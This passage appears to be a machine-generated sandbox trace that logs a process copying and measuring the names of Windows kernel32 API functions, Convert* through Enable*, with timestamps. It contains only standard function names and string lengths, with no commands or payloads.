[0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.788] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.788] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.788] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.788] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.788] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.788] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.788] lstrlenA (lpString="COPYFILEA") returned 9 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.788] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.788] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.788] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.788] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.788] lstrlenA (lpString="COPYFILEW") returned 9 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.788] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.788] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.788] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.789] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.789] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.789] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.789] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.789] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.789] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.789] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.789] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.789] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.789] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.789] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.789] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.789] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.789] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.789] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.789] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.789] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.789] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.789] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.790] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.790] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.790] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.790] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.790] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.790] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.790] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.790] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.790] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.790] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.790] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.790] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.790] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.790] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.790] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.790] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.790] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.790] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.790] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.790] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.791] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.791] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.791] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.791] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.791] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.791] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.791] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.791] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.791] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.791] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.791] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.791] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.791] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.791] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.791] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.791] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.791] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.791] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.791] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.791] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.792] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.792] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.792] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.792] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.792] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.792] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.792] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.792] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.792] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.792] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.792] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.792] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.792] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.792] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.792] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.792] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.792] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.792] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.793] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.793] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.793] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.793] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.793] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.793] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.793] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.793] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.793] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.793] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.793] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.793] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.793] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.793] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.793] lstrlenA (lpString="DELETEATOM") returned 10 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.793] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.793] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.793] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.793] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.793] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.794] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.794] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.794] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.794] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.794] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.794] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.794] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.794] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.794] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.794] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.794] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.794] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.794] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.794] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.794] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.794] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.794] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.794] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.794] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.795] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.795] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.795] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.795] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, 